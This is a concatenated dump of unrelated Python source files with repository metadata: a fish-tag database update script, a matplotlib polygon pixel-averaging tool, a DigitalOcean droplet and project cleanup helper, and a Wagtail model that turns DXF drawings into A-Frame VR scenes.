    # restrict to cwts actually stocked by the OMNR; there must be exactly one
    qs = CWT.objects.filter(
        cwt_number=cwt_num, cwt_series__events__agency=omnr
    ).distinct()
    assert len(qs) == 1
    cwt = qs[0]
    cwt.manufacturer = "mm"
    cwt.save()
# these are the cwt number that have been purchased from two
# vendors. The event numbers are the stocking event IDs that used the
# Micro Mark tags.
micromark_events = {
    # chinook stocked by ssa in 2001 - Not in FSIS Yet!
    # "634104": [],
    # chinook stocked by ssa in 2001 - Not in FSIS Yet!
    # "634304": [],
    "635603": [2650],
    "635901": [2379, 2928],
}
# now loop over cwt numbers that have been purchased from 2
# manufacturers and get the events associated with each one create a
# new CWT object and new cwt_sequence. Finally, get the original
# stocking event and assign it to the sequence object created above.
for cwt_num, event_nums in micromark_events.items():
    print("Applying updates for both {} tags...".format(cwt_num))
    # create the Micro Mark twin of this cwt number (placeholder sequence 0-1)
    cwt_obj, created = CWT.objects.get_or_create(
        cwt_number=cwt_num, tag_type="cwt", tag_count=0, manufacturer="mm"
    )
    cwt_seq, created = CWTsequence.objects.get_or_create(cwt=cwt_obj, sequence=(0, 1))
    if event_nums:
        for fsis_id in event_nums:
            lwdb_id = fsis2lwdb.get(str(fsis_id))
            if lwdb_id:
                # re-point the stocking event from the NMT cwt to the MM one
                event = StockingEvent.objects.get(id=lwdb_id)
                event.cwt_series.clear()
                cwt_seq.events.add(event)
            else:
                # NOTE(review): "/t" looks like a typo for the tab escape "\t",
                # and "unable for find" for "unable to find".
                print("/t unable for find FSIS event: {}".format(fsis_id))
print("Done updating Ontario-Huron tags.")
3507ca02ee239037d5eef8f695a0bc5d29d25160 | 2,001 | py | Python | mathplotlib/calculate_polygon_area.py | ronistiawan/python-scripts | fa2fa0215d753f1eb2c5e1ce98a8f2f2eaaa8eef | [
"MIT"
] | null | null | null | mathplotlib/calculate_polygon_area.py | ronistiawan/python-scripts | fa2fa0215d753f1eb2c5e1ce98a8f2f2eaaa8eef | [
"MIT"
] | null | null | null | mathplotlib/calculate_polygon_area.py | ronistiawan/python-scripts | fa2fa0215d753f1eb2c5e1ce98a8f2f2eaaa8eef | [
"MIT"
] | null | null | null | from PIL import Image
import numpy as np
from matplotlib.path import Path
import matplotlib.pyplot as plt
import matplotlib.patches as patches
image = Image.open('samp3.png', 'r') #read image
image = image.convert('L') #convert image to greyscale
data = np.asarray(image) #convert image to numpy array
n_rows = len(data)     # image height (y / row count)
n_columns = len(data[0])  # image width (x / column count)
point = []  # clicked polygon vertices as [xdata, ydata] pairs
#-------------------------- * Draw Point *-------------------------
def drawCircle(x, y):
    """Mark a clicked vertex with a small red dot and refresh the canvas."""
    global ax
    dot = patches.Circle((x, y), 2, lw=1, ls='-', fill=True, color='red')
    ax.add_patch(dot)
    plt.draw()
    return ax
#-------------------------- * Draw Polygon and calculate average of pixel values *------
def drawPolygon(p):
global point
line = patches.Polygon(point, lw=1, ls='-', fill=False, color='red')
ax.add_line(line)
plt.draw()
p = Path(point)
total = 0
n = 0
for i in range(0,n_rows):
for j in range(0, n_columns):
if(p.contains_point([i,j])):
total += data[i][j]
n += 1
print("Average pixel values in the Polygon = "+ str(total/n))
#----------------------------- * On click event * --------------------------
def onclick(event):
    """Collect clicked vertices; a double click closes the polygon.

    Fixes: removed the unused ``global xc, yc`` declaration (neither name
    exists anywhere in the file), and parenthesized the Python-2-only print
    statement so the file also parses under Python 3.
    """
    global ax, patches
    global point
    x, y = event.xdata, event.ydata
    # stop listening when the user double clicks
    if event.dblclick:
        drawPolygon(point)
        fig.canvas.mpl_disconnect(cid)
        #print("stoped listening for events")
    else:
        point.append([x, y])
        print('added vertice : (%d,%d)' % (x, y))
        drawCircle(x, y)
        return point
#-------------------------------------------------------------------------
fig,ax = plt.subplots(1)
ax.imshow(data, cmap='gray')
# wire mouse clicks to the vertex collector above
cid = fig.canvas.mpl_connect('button_press_event', onclick)
# NOTE(review): the message is out of date — onclick() stops on a DOUBLE
# click, not on a click in the top left corner.
print("start listening for mouse clicks ... click on top left corner to stop listening")
plt.show()
plt.draw()
350b9abb1ca4e2974d32cb349bf6a2ec364bd5f2 | 2,425 | py | Python | digital_ocean.py | Nahid5/digitalOceanHelper | 6250ca4969d3d2bc402054d1ea240a3e1743341d | [
"Apache-2.0"
] | null | null | null | digital_ocean.py | Nahid5/digitalOceanHelper | 6250ca4969d3d2bc402054d1ea240a3e1743341d | [
"Apache-2.0"
] | null | null | null | digital_ocean.py | Nahid5/digitalOceanHelper | 6250ca4969d3d2bc402054d1ea240a3e1743341d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
import requests
import json
#Enter DO token (personal access token — keep it out of version control)
DOTOKEN = ""
# Default headers for every DigitalOcean API v2 request.
HEADERS = {"Authorization": "Bearer " + DOTOKEN, "Content-Type": "application/json"}
##################################################################################
# Droplets
#
##################################################################################
def get_current_droplet_count():
    '''
    Returns the number of droplets currently created and total droplet limit
    Return: [CURRENT DROPLET NUMBERS, MAX ACCOUNT CAN MAKE]

    BUG FIX: the original referenced an undefined lowercase ``headers`` and
    an undefined ``jsonData`` (the droplet list was never fetched), so it
    raised NameError on every call.
    '''
    # meta.total on the droplet listing is the current droplet count
    r = requests.get("https://api.digitalocean.com/v2/droplets?page=1&per_page=1", headers=HEADERS)
    jsonData = json.loads(r.text)
    r2 = requests.get("https://api.digitalocean.com/v2/account", headers=HEADERS)
    jsonData2 = json.loads(r2.text)
    # droplet_limit is the account's droplet quota (volume_limit, used by the
    # original, is the block-storage volume quota)
    return [str(jsonData["meta"]["total"]), str(jsonData2["account"]["droplet_limit"])]
def get_all_droplets():
    '''
    Print id, name, creation time and tags for every droplet on the account.
    '''
    resp = requests.get("https://api.digitalocean.com/v2/droplets?page=1&per_page=1000", headers=HEADERS)
    payload = json.loads(resp.text)
    # One line per droplet.
    for droplet in payload["droplets"]:
        line = "%s: %s %s %s" % (
            droplet["id"], droplet["name"], droplet["created_at"], droplet["tags"]
        )
        print(line)
def delete_droplet_by_id(id):
    '''
    Delete the droplet with the given id and print the HTTP status code.
    '''
    url = "https://api.digitalocean.com/v2/droplets/" + id
    response = requests.delete(url, headers=HEADERS)
    print(response.status_code)
##################################################################################
# Projects
#
##################################################################################
def get_all_projects():
    '''
    Fetch every project and delete the ones that own no resources.

    NOTE(review): despite its "get_all" name this function is destructive --
    it calls delete_project_by_id() for each empty project it finds.
    '''
    r = requests.get("https://api.digitalocean.com/v2/projects", headers=HEADERS)
    jsonData = json.loads(r.text)
    #rint(jsonData)
    for project in jsonData["projects"]:
        if(is_project_empty(project["id"])):
            #print(project["name"] + " is empty")
            delete_project_by_id(project["id"])
def is_project_empty(id):
    '''
    Return True when the project owns no resources, False otherwise.
    '''
    url = "https://api.digitalocean.com/v2/projects/" + id + "/resources"
    payload = json.loads(requests.get(url, headers=HEADERS).text)
    #print(payload)
    return payload["meta"]["total"] == 0
def delete_project_by_id(id):
    '''
    Delete the project with the given id (fire and forget).
    '''
    url = "https://api.digitalocean.com/v2/projects/" + id
    requests.delete(url, headers=HEADERS)
if(__name__ == "__main__"):
    # When run as a script: prune all empty projects from the account.
    get_all_projects()
350be143f1d30bd097d33dfb553998544343e178 | 24,784 | py | Python | models.py | andywar65/dxf2vr | b51f8579b0e84c770f54c9d20b42cfe8d84a9031 | [
"BSD-2-Clause"
] | 3 | 2020-04-20T05:35:19.000Z | 2020-11-04T07:24:55.000Z | models.py | andywar65/dxf2vr | b51f8579b0e84c770f54c9d20b42cfe8d84a9031 | [
"BSD-2-Clause"
] | null | null | null | models.py | andywar65/dxf2vr | b51f8579b0e84c770f54c9d20b42cfe8d84a9031 | [
"BSD-2-Clause"
] | null | null | null | import os
from math import radians, sin, cos, asin, degrees, pi, sqrt, pow, fabs, atan2
from django import forms
from django.db import models
from django.conf import settings
from modelcluster.fields import ParentalKey
from wagtail.wagtailcore.models import Page, Orderable
from wagtail.wagtailadmin.edit_handlers import FieldPanel, InlinePanel, MultiFieldPanel
from wagtail.wagtailimages.edit_handlers import ImageChooserPanel
from wagtail.wagtailsearch import index
from wagtail.wagtaildocs.models import Document
from wagtail.wagtaildocs.edit_handlers import DocumentChooserPanel
class Dxf2VrPage(Page):
    """Wagtail page that converts an uploaded DXF drawing into A-Frame VR markup."""
    # short teaser shown in listings
    intro = models.CharField(max_length=250, null=True, blank=True,)
    # 360-degree background used as the scene sky
    equirectangular_image = models.ForeignKey(
        'wagtailimages.Image',
        null=True,
        blank=True,
        on_delete = models.SET_NULL,
        related_name = '+',
    )
    # the DXF drawing parsed by extract_dxf()
    dxf_file = models.ForeignKey(
        'wagtaildocs.Document',
        null=True,
        on_delete = models.SET_NULL,
        related_name = '+',
    )
    # scene rendering toggles
    shadows = models.BooleanField(default=False)
    fly_camera = models.BooleanField(default=False)
    double_face = models.BooleanField(default=False)
    search_fields = Page.search_fields + [
        index.SearchField('intro'),
        #index.SearchField('body'),
    ]
    content_panels = Page.content_panels + [
        FieldPanel('intro'),
        DocumentChooserPanel('dxf_file'),
        ImageChooserPanel('equirectangular_image'),
        MultiFieldPanel([
            FieldPanel('shadows'),
            FieldPanel('fly_camera'),
            FieldPanel('double_face'),
        ], heading="Visual settings"),
        InlinePanel('material_images', label="Material Image Gallery",),
    ]
    def extract_dxf(self):
        """Parse the page's DXF file and return {index: A-Frame markup string}.

        Reads the ENTITIES section as (group code, value) line pairs. 3DFACE
        entities become one or two <a-triangle>s; INSERT entities (blocks)
        are dispatched to the make_* helpers by block name, with ATTRIB
        values collected into ``temp``. Colors/patterns come from the page's
        material_images gallery, keyed by DXF layer name.
        """
        path_to_dxf = os.path.join(settings.MEDIA_ROOT, 'documents', self.dxf_file.filename)
        dxf_f = open(path_to_dxf, encoding = 'utf-8')
        material_gallery=self.material_images.all()
        output = {}
        flag = False
        x = 0
        value = 'dummy'
        # skip everything up to the ENTITIES section
        while value !='ENTITIES':
            key = dxf_f.readline().strip()
            value = dxf_f.readline().strip()
        while value !='ENDSEC':
            key = dxf_f.readline().strip()
            value = dxf_f.readline().strip()
            if flag == 'face':#stores values for 3D faces
                if key == '8':#layer name
                    temp[key] = value
                elif key == '10' or key == '11' or key == '12' or key == '13':#X position
                    temp[key] = value
                elif key == '20' or key == '21' or key == '22' or key == '23':#mirror Y position
                    value = -float(value)
                    temp[key] = value
                elif key == '30' or key == '31' or key == '32' or key == '33':#Z position
                    temp[key] = value
            elif flag == 'block':#stores values for blocks
                if key == '2' or key == '8':#block name and layer name
                    temp[key] = value
                elif key == '10' or key == '30':#X Z position
                    temp[key] = value
                elif key == '20':#Y position, mirrored
                    temp[key] = -float(value)
                elif key == '50':#Z rotation
                    temp[key] = value
                elif key == '41' or key == '42' or key == '43':#scale values
                    temp[key] = value
                elif key == '210':#X of OCS unitary vector
                    Az_1 = float(value)
                    P_x = float(temp['10'])
                elif key == '220':#Y of OCS unitary vector
                    Az_2 = float(value)
                    P_y = -float(temp['20'])#reset original value
                elif key == '230':#Z of OCS unitary vector
                    # group 230 closes the OCS extrusion vector: convert the
                    # insertion point and rotation from OCS to world space here
                    Az_3 = float(value)
                    P_z = float(temp['30'])
                    #arbitrary axis algorithm
                    #see if OCS z vector is close to world Z axis
                    if fabs(Az_1) < (1/64) and fabs(Az_2) < (1/64):
                        W = ('Y', 0, 1, 0)
                    else:
                        W = ('Z', 0, 0, 1)
                    #cross product for OCS x arbitrary vector, normalized
                    Ax_1 = W[2]*Az_3-W[3]*Az_2
                    Ax_2 = W[3]*Az_1-W[1]*Az_3
                    Ax_3 = W[1]*Az_2-W[2]*Az_1
                    Norm = sqrt(pow(Ax_1, 2)+pow(Ax_2, 2)+pow(Ax_3, 2))
                    Ax_1 = Ax_1/Norm
                    Ax_2 = Ax_2/Norm
                    Ax_3 = Ax_3/Norm
                    #cross product for OCS y arbitrary vector, normalized
                    Ay_1 = Az_2*Ax_3-Az_3*Ax_2
                    Ay_2 = Az_3*Ax_1-Az_1*Ax_3
                    Ay_3 = Az_1*Ax_2-Az_2*Ax_1
                    Norm = sqrt(pow(Ay_1, 2)+pow(Ay_2, 2)+pow(Ay_3, 2))
                    Ay_1 = Ay_1/Norm
                    Ay_2 = Ay_2/Norm
                    Ay_3 = Ay_3/Norm
                    #insertion world coordinates from OCS
                    temp['10'] = P_x*Ax_1+P_y*Ay_1+P_z*Az_1
                    temp['20'] = P_x*Ax_2+P_y*Ay_2+P_z*Az_2
                    temp['30'] = P_x*Ax_3+P_y*Ay_3+P_z*Az_3
                    #OCS X vector translated into WCS
                    Ax_1 = ((P_x+cos(radians(float(temp['50']))))*Ax_1+(P_y+sin(radians(float(temp['50']))))*Ay_1+P_z*Az_1)-temp['10']
                    Ax_2 = ((P_x+cos(radians(float(temp['50']))))*Ax_2+(P_y+sin(radians(float(temp['50']))))*Ay_2+P_z*Az_2)-temp['20']
                    Ax_3 = ((P_x+cos(radians(float(temp['50']))))*Ax_3+(P_y+sin(radians(float(temp['50']))))*Ay_3+P_z*Az_3)-temp['30']
                    #cross product for OCS y vector, normalized
                    Ay_1 = Az_2*Ax_3-Az_3*Ax_2
                    Ay_2 = Az_3*Ax_1-Az_1*Ax_3
                    Ay_3 = Az_1*Ax_2-Az_2*Ax_1
                    Norm = sqrt(pow(Ay_1, 2)+pow(Ay_2, 2)+pow(Ay_3, 2))
                    Ay_1 = Ay_1/Norm
                    Ay_2 = Ay_2/Norm
                    Ay_3 = Ay_3/Norm
                    #A-Frame rotation order is Yaw(Z), Pitch(X) and Roll(Y)
                    #thanks for help Marilena Vendittelli and https://www.geometrictools.com/
                    if Ay_3<1:
                        if Ay_3>-1:
                            pitch = asin(Ay_3)
                            yaw = atan2(-Ay_1, Ay_2)
                            roll = atan2(-Ax_3, Az_3)
                        else:
                            # gimbal lock, looking straight down
                            pitch = -pi/2
                            yaw = -atan2(Az_1, Ax_1)
                            roll = 0
                    else:
                        # gimbal lock, looking straight up
                        pitch = pi/2
                        yaw = atan2(Az_1, Ax_1)
                        roll = 0
                    #Y position, mirrored
                    temp['20'] = -temp['20']
                    #rotations from radians to degrees
                    temp['210'] = degrees(pitch)
                    temp['50'] = degrees(yaw)
                    temp['220'] = -degrees(roll)
            elif flag == 'attrib':#stores values for attributes within block
                if key == '1':#attribute value
                    attr_value = value
                elif key == '2':#attribute key
                    temp[value] = attr_value
                    flag = 'block'#restore block modality
            if key == '0':
                # group code 0 closes the previous entity and starts a new one
                if flag == 'face':#close 3D face
                    #is material set in model?
                    no_color=True
                    if material_gallery:
                        for material in material_gallery:
                            if material.layer == temp['8']:
                                no_color=False
                                temp['color'] = material.color
                    if no_color:#color is still not set for layer, so we use default
                        temp['8'] = 'default'
                        temp['color'] = 'white'
                    output[x] = self.make_triangle_1(x, temp)
                    # a quad (vertex 3 differs from vertex 4) needs a second triangle
                    if temp['12']!=temp['13'] or temp['22']!=temp['23'] or temp['32']!=temp['33']:
                        x += 1
                        output[x] = self.make_triangle_2(x, temp)
                    flag = False
                elif value == 'ATTRIB':#start attribute within block
                    attr_value = ''
                    flag = 'attrib'
                elif flag == 'block':#close block
                    #material images are patterns? is material set in model?
                    no_color=True
                    if material_gallery:
                        for material in material_gallery:
                            if material.layer == temp['8']:
                                no_color=False
                                temp['color'] = material.color
                                if material.pattern:# == True
                                    temp['repeat']=True
                    if no_color:#color is still not set for layer, so we use default
                        temp['8'] = 'default'
                        temp['color'] = 'white'
                    # dispatch on block name to the matching A-Frame builder
                    if temp['2'] == '6planes':#left for legacy
                        output[x] = self.make_box(x, temp)
                    elif temp['2'] == 'box' or temp['2'] == 'a-box':
                        output[x] = self.make_box(x, temp)
                    elif temp['2'] == 'cylinder' or temp['2'] == 'a-cylinder':
                        output[x] = self.make_cylinder(x, temp)
                    elif temp['2'] == 'cone' or temp['2'] == 'a-cone':
                        output[x] = self.make_cone(x, temp)
                    elif temp['2'] == 'sphere' or temp['2'] == 'a-sphere':
                        output[x] = self.make_sphere(x, temp)
                    elif temp['2'] == 'circle' or temp['2'] == 'a-circle':
                        output[x] = self.make_circle(x, temp)
                    elif temp['2'] == 'plane' or temp['2'] == 'a-plane' or temp['2'] == 'look-at':
                        output[x] = self.make_plane(x, temp)
                    elif temp['2'] == 'floor':#left for legacy
                        temp['210'] = float(temp['210']) - 90
                        output[x] = self.make_plane(x, temp)
                    elif temp['2'] == 'ceiling':#left for legacy
                        temp['210'] = float(temp['210']) + 90
                        output[x] = self.make_plane(x, temp)
                    elif temp['2'] == 'light' or temp['2'] == 'a-light':
                        output[x] = self.make_light(x, temp)
                    elif temp['2'] == 'a-text':
                        output[x] = self.make_text(x, temp)
                    elif temp['2'] == 'a-link':
                        output[x] = self.make_link(x, temp)
                    flag = False
                if value == '3DFACE':#start 3D face
                    temp = {}#default values
                    flag = 'face'
                    x += 1
                elif value == 'INSERT':#start block
                    temp = {'41': 1, '42': 1, '43': 1, '50': 0, '210': 0, '220': 0, '230': 1,'repeat': False}#default values
                    flag = 'block'
                    x += 1
        dxf_f.close()
        return output
def is_repeat(self, repeat, rx, ry):
if repeat:
output = f'; repeat:{rx} {ry}'
return output
else:
return ';'
def make_box(self, x, temp):
outstr = f'<a-entity id="box-ent-{x}" \n'
outstr += f'position="{temp["10"]} {temp["30"]} {temp["20"]}" \n'
outstr += f'rotation="{temp["210"]} {temp["50"]} {temp["220"]}">\n'
outstr += f'<a-box id="box-{x}" \n'
outstr += f'position="{float(temp["41"])/2} {float(temp["43"])/2} {-float(temp["42"])/2}" \n'
outstr += f'scale="{temp["41"]} {temp["43"]} {temp["42"]}" \n'
outstr += 'geometry="'
try:
if temp['segments-depth']!='1':
outstr += f'segments-depth: {temp["segments-depth"]};'
if temp['segments-height']!='1':
outstr += f'segments-height: {temp["segments-height"]};'
if temp['segments-width']!='1':
outstr += f'segments-width: {temp["segments-width"]};'
outstr += '" \n'
except KeyError:
outstr += '" \n'
outstr += f'material="src: #image-{temp["8"]}; color: {temp["color"]}'
outstr += self.is_repeat(temp["repeat"], temp["41"], temp["43"])
outstr += '">\n</a-box>\n</a-entity>\n'
return outstr
def make_cone(self, x, temp):
outstr = f'<a-entity id="cone-ent-{x}" \n'
outstr += f'position="{temp["10"]} {temp["30"]} {temp["20"]}" \n'
outstr += f'rotation="{temp["210"]} {temp["50"]} {temp["220"]}">\n'
outstr += f'<a-cone id="cone-{x}" \n'
outstr += f'position="0 {float(temp["43"])/2} 0" \n'
outstr += f'scale="{temp["41"]} {temp["43"]} {temp["42"]}" \n'
outstr += 'geometry="'
try:
if temp['open-ended']!='false':
outstr += 'open-ended: true;'
if temp['radius-top']!='0':
outstr += f'radius-top: {temp["radius-top"]};'
if temp['segments-height']!='18':
outstr += f'segments-height: {temp["segments-height"]};'
if temp['segments-radial']!='36':
outstr += f'segments-radial: {temp["segments-radial"]};'
if temp['theta-length']!='360':
outstr += f'theta-length: {temp["theta-length"]};'
if temp['theta-start']!='0':
outstr += f'theta-start: {temp["theta-start"]};'
outstr += '" \n'
except KeyError:
outstr += '" \n'
outstr += f'material="src: #image-{temp["8"]}; color: {temp["color"]}'
outstr += self.is_repeat(temp["repeat"], temp["41"], temp["43"])
outstr += '">\n</a-cone>\n</a-entity>\n'
return outstr
def make_circle(self, x, temp):
outstr = f'<a-entity id="circle-ent-{x}" \n'
outstr += f'position="{temp["10"]} {temp["30"]} {temp["20"]}" \n'
outstr += f'rotation="{temp["210"]} {temp["50"]} {temp["220"]}">\n'
outstr += f'<a-circle id="circle-{x}" \n'
if temp['2'] == 'circle':
outstr += f'rotation="-90 0 0"\n'
outstr += f'radius="{temp["41"]}" \n'
outstr += 'geometry="'
try:
if temp['segments']!='32':
outstr += f'segments: {temp["segments"]};'
if temp['theta-length']!='360':
outstr += f'theta-length: {temp["theta-length"]};'
if temp['theta-start']!='0':
outstr += f'theta-start: {temp["theta-start"]};'
outstr += '" \n'
except KeyError:
outstr += '" \n'
outstr += f'material="src: #image-{temp["8"]}; color: {temp["color"]}'
outstr += self.is_repeat(temp["repeat"], temp["41"], temp["43"])
outstr += '">\n</a-circle>\n</a-entity>\n'
return outstr
def make_cylinder(self, x, temp):
outstr = f'<a-entity id="cylinder-ent-{x}" \n'
outstr += f'position="{temp["10"]} {temp["30"]} {temp["20"]}" \n'
outstr += f'rotation="{temp["210"]} {temp["50"]} {temp["220"]}">\n'
outstr += f'<a-cylinder id="cylinder-{x}" \n'
outstr += f'position="0 {float(temp["43"])/2} 0" \n'
outstr += f'scale="{temp["41"]} {temp["43"]} {temp["42"]}" \n'
outstr += 'geometry="'
try:
if temp['open-ended']!='false':
outstr += 'open-ended: true;'
if temp['radius-top']!='0':
outstr += f'radius-top: {temp["radius-top"]};'
if temp['segments-height']!='18':
outstr += f'segments-height: {temp["segments-height"]};'
if temp['segments-radial']!='36':
outstr += f'segments-radial: {temp["segments-radial"]};'
if temp['theta-length']!='360':
outstr += f'theta-length: {temp["theta-length"]};'
if temp['theta-start']!='0':
outstr += f'theta-start: {temp["theta-start"]};'
outstr += '" \n'
except KeyError:
outstr += '" \n'
outstr += f'material="src: #image-{temp["8"]}; color: {temp["color"]}'
outstr += self.is_repeat(temp["repeat"], temp["41"], temp["43"])
outstr += '">\n</a-cylinder>\n</a-entity>\n'
return outstr
def make_sphere(self, x, temp):
outstr = f'<a-entity id="sphere-ent-{x}" \n'
outstr += f'position="{temp["10"]} {temp["30"]} {temp["20"]}" \n'
outstr += f'rotation="{temp["210"]} {temp["50"]} {temp["220"]}">\n'
outstr += f'<a-sphere id="sphere-{x}" \n'
outstr += f'position="0 {temp["43"]} 0" \n'
outstr += f'scale="{temp["41"]} {temp["43"]} {temp["42"]}" \n'
outstr += 'geometry="'
try:
if temp['phi-length']!='360':
outstr += f'phi-length: {temp["phi-length"]};'
if temp['phi-start']!='0':
outstr += f'phi-start: {temp["phi-start"]};'
if temp['segments-height']!='18':
outstr += f'segments-height: {temp["segments-height"]};'
if temp['segments-width']!='36':
outstr += f'segments-width: {temp["segments-width"]};'
if temp['theta-length']!='180':
outstr += f'theta-length: {temp["theta-length"]};'
if temp['theta-start']!='0':
outstr += f'theta-start: {temp["theta-start"]};'
outstr += '" \n'
except KeyError:
outstr += '" \n'
outstr += f'material="src: #image-{temp["8"]}; color: {temp["color"]}'
outstr += self.is_repeat(temp["repeat"], temp["41"], temp["43"])
outstr += '">\n</a-sphere>\n</a-entity>\n'
return outstr
def make_plane(self, x, temp):
outstr = f'<a-entity id="plane-ent-{x}" \n'
outstr += f'position="{temp["10"]} {temp["30"]} {temp["20"]}" \n'
outstr += f'rotation="{temp["210"]} {temp["50"]} {temp["220"]}">\n'
outstr += f'<a-plane id="plane-{x}" \n'
if temp['2'] == 'look-at':#if it's a look at, it is centered and looks at the camera foot
outstr += f'position="0 {float(temp["43"])/2} 0" \n'
outstr += 'look-at="#camera-foot" \n'
elif temp['2'] == 'ceiling':#if it's a ceiling, correct position
outstr += f'position="{float(temp["41"])/2} {-float(temp["43"])/2} 0" \n'
else:#insertion is at corner
outstr += f'position="{float(temp["41"])/2} {float(temp["43"])/2} 0" \n'
outstr += f'width="{temp["41"]}" height="{temp["43"]}" \n'
outstr += 'geometry="'
try:
if temp['segments-height']!='1':
outstr += f'segments-height: {temp["segments-height"]};'
if temp['segments-width']!='1':
outstr += f'segments-width: {temp["segments-width"]};'
outstr += '" \n'
except KeyError:
outstr += '" \n'
outstr += f'material="src: #image-{temp["8"]}; color: {temp["color"]}'
outstr += self.is_repeat(temp["repeat"], temp["41"], temp["43"])
outstr += '">\n</a-plane>\n</a-entity>\n'
return outstr
def make_text(self, x, temp):
outstr = f'<a-entity id="text-{x}" \n'
outstr += f'position="{temp["10"]} {temp["30"]} {temp["20"]}" \n'
outstr += f'rotation="{temp["210"]} {temp["50"]} {temp["220"]}"\n'
outstr += f'text="width: {temp["41"]}; align: {temp["align"]}; color: {temp["color"]}; '
outstr += f'value: {temp["text"]}; wrap-count: {temp["wrap-count"]}; '
outstr += '">\n</a-entity>\n'
return outstr
def make_link(self, x, temp):
    """Render a DXF link block as an A-Frame <a-link> pointing at a page
    related to this one in the wagtail page tree.

    temp['tree'] picks the target page: 'parent', 'child' (first child),
    'previous'/'prev' (previous sibling); anything else defaults to the
    next sibling.  Returns '' when no such page exists.
    """
    outstr = f'<a-link id="link-{x}" \n'
    outstr += f'position="{temp["10"]} {temp["30"]} {temp["20"]}" \n'
    outstr += f'rotation="{temp["210"]} {temp["50"]} {temp["220"]}"\n'
    outstr += f'scale="{temp["41"]} {temp["43"]} {temp["42"]}"\n'
    if temp['tree'] == 'parent':
        target = self.get_parent()
    elif temp['tree'] == 'child':
        target = self.get_first_child()
    elif temp['tree'] == 'previous' or temp['tree'] == 'prev':
        target = self.get_prev_sibling()
    else:#we default to next sibling
        target = self.get_next_sibling()
    if target:
        outstr += f'href="{target.url}"\n'
        outstr += f'title="{temp["title"]}" color="{temp["color"]}" on="click"\n'
        # Use the target page's 360deg image as link preview when it has one.
        eq_image = target.specific.equirectangular_image
        if eq_image:
            outstr += f'image="{eq_image.file.url}"'
        else:
            outstr += 'image="#default-sky"'
        outstr += '>\n</a-link>\n'
        return outstr
    else:
        return ''
def make_triangle_1(self, x, temp):
    """Render the first triangle of a DXF 3DFACE (vertices A, B, C)."""
    fragment = [
        f'<a-triangle id="triangle-{x}" \n',
        f'geometry="vertexA:{temp["10"]} {temp["30"]} {temp["20"]}; \n',
        f'vertexB:{temp["11"]} {temp["31"]} {temp["21"]}; \n',
        f'vertexC:{temp["12"]} {temp["32"]} {temp["22"]}" \n',
        f'material="src: #image-{temp["8"]}; color: {temp["color"]}; ',
    ]
    if self.double_face:
        fragment.append('side: double; ')
    fragment.append('">\n</a-triangle> \n')
    return ''.join(fragment)
def make_triangle_2(self, x, temp):
    """Render the second triangle of a DXF 3DFACE (vertices A, C, D)."""
    fragment = [
        f'<a-triangle id="triangle-{x}" \n',
        f'geometry="vertexA:{temp["10"]} {temp["30"]} {temp["20"]}; \n',
        f'vertexB:{temp["12"]} {temp["32"]} {temp["22"]}; \n',
        f'vertexC:{temp["13"]} {temp["33"]} {temp["23"]}" \n',
        f'material="src: #image-{temp["8"]}; color: {temp["color"]}; ',
    ]
    if self.double_face:
        fragment.append('side: double; ')
    fragment.append('">\n</a-triangle> \n')
    return ''.join(fragment)
def make_light(self, x, temp):
    """Render a DXF light block as an A-Frame light <a-entity> fragment.

    temp['type'] selects the light kind (ambient / point / spot, default
    directional); a missing type falls back to a fixed point light.
    Spot and directional lights get a child target entity 1 unit below.
    """
    outstr = f'<a-entity id="light-{x}" \n'
    outstr += f'position="{temp["10"]} {temp["30"]} {temp["20"]}" \n'
    outstr += f'rotation="{temp["210"]} {temp["50"]} {temp["220"]}"\n'
    # KeyError from any missing attribute drops to the default point light.
    try:
        if temp['type'] == 'ambient':
            outstr += f'light="type: ambient; color: {temp["color"]}; intensity: {temp["intensity"]}; '
            outstr += '">\n</a-entity>\n'#close light entity
        elif temp['type'] == 'point':
            outstr += f'light="type: point; color: {temp["color"]}; intensity: {temp["intensity"]}; '
            outstr += f'decay: {temp["decay"]}; distance: {temp["distance"]}; '
            if self.shadows:
                outstr += 'castShadow: true; '
            outstr += '"> \n</a-entity>\n'#close light entity
        elif temp['type'] == 'spot':
            outstr += f'light="type: spot; color: {temp["color"]}; intensity: {temp["intensity"]}; '
            outstr += f'decay: {temp["decay"]}; distance: {temp["distance"]}; '
            outstr += f'angle: {temp["angle"]}; penumbra: {temp["penumbra"]}; '
            if self.shadows:
                outstr += 'castShadow: true; '
            outstr += f'target: #light-{x}-target;"> \n'
            outstr += f'<a-entity id="light-{x}-target" position="0 -1 0"> </a-entity> \n</a-entity> \n'#close light entity
        else:#defaults to directional
            outstr += f'light="type: directional; color: {temp["color"]}; intensity: {temp["intensity"]}; '
            if self.shadows:
                outstr += 'castShadow: true; '
            outstr += f'target: #light-{x}-target;"> \n'
            outstr += f'<a-entity id="light-{x}-target" position="0 -1 0"> </a-entity> \n</a-entity> \n'#close light entity
    except KeyError:#default if no light type is set
        outstr += 'light="type: point; intensity: 0.75; distance: 50; decay: 2; '
        if self.shadows:
            outstr += 'castShadow: true;'
        outstr += '">\n</a-entity>\n'#close light entity
    return outstr
class Dxf2VrPageMaterialImage(Orderable):
    """Per-page material entry mapping a DXF layer to an image and color."""
    page = ParentalKey(Dxf2VrPage, related_name='material_images')
    # Optional image used as the material texture for entities on the layer.
    image = models.ForeignKey(
        'wagtailimages.Image',
        null=True,
        blank=True,
        on_delete = models.SET_NULL,
        related_name = '+',
    )
    layer = models.CharField(max_length=250, default="0",)  # DXF layer name
    color = models.CharField(max_length=250, default="white",)  # material color
    # Whether the image tiles as a repeating pattern — presumably consumed by
    # is_repeat(); TODO confirm.
    pattern = models.BooleanField(default=False)
    panels = [
        FieldPanel('layer'),
        ImageChooserPanel('image'),
        FieldPanel('pattern'),
        FieldPanel('color'),
    ]
350cec8c27b5dd37429a101a908ea432ca1e45e2 | 1,308 | py | Python | scenarios/activity-update-and-delete/bots/activity_update_and_delete_bot.py | Shiftersky/botbuilder-python | e00ea990d5cb5b05d545d87c51249dfa8f183581 | [
"MIT"
] | 1 | 2020-02-19T15:50:10.000Z | 2020-02-19T15:50:10.000Z | scenarios/activity-update-and-delete/bots/activity_update_and_delete_bot.py | Fortune-Adekogbe/botbuilder-python | 4e48c874c32a2a7fe7f27a7a1f825e2aa39466c4 | [
"MIT"
] | null | null | null | scenarios/activity-update-and-delete/bots/activity_update_and_delete_bot.py | Fortune-Adekogbe/botbuilder-python | 4e48c874c32a2a7fe7f27a7a1f825e2aa39466c4 | [
"MIT"
] | null | null | null | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
from botbuilder.core import MessageFactory, TurnContext, ActivityHandler
